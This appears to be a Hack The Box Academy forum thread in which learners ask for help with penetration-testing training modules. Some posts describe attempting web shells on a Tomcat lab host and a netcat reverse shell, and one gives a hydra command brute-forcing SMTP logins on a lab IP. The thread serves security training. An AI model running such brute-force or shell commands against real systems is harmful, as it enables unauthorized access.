shells & payloads, skills assessment, I have no clue what to do. I RDP into the host (which is painfully slow, it runs at 5 fps for some reason), I log in to tomcat with creds I found in the ||file system along with some admin creds||, I tried the aspx file, didn't work, I tried changing the content with burp, I can only forward once, it does nothing, there is no output at all, I tried a metasploit module I found, nothing, I tried with antak and php too, nothing.
can I please have some help?
anyone that can help me with linux credentials harvesting..
don't know what module it is, but u can dm me if u want and I will try to help u
u can also dm me
It's the password attacks module
what do you need help with..question/details
Hello.
Hi everyone
I need help with the getting started module, web enumeration part!
There's this question asking to find the flag:
Can somebody pls tell me what is a flag?
A flag is the text contents of a file that is the goal you are achieving, usually in the form of HTB{...} However it may be different depending on the question. Usually the question informs you of the format it's looking for
Hello, I am new to htb. Do you have any recommendation on what modules I should start first?
Any of the fundamentals
Attacking Common Services Easy
Found the user F***** using smtp-user-enum
then I tried brute forcing FTP and SMTP using hydra but no valid password
hydra -l "f*****" -P pws.list -f 10.129.3.121 smtp
To create code blocks either put your line in between backticks `like this`
Or triple ticks for multiple lines
You are on point with user F, try the other services, besides FTP and SMTP.
Hello, in AD skills assessments part I, I am trying to perform a reverse shell with netcat (first question), but when executing netcat (with the full path and the .exe), I get the error that the executable is corrupt. Any idea how to perform the reverse shell? (tried with msfvenom and got no response)
Hello, I am stuck on the service enumeration module. https://academy.hackthebox.com/module/19/section/103. It says enumerate all services and one of the services has the flag. I enumerated with --packet-trace and one of the services returned a random string but this string doesn't work as a flag. I am highly confused
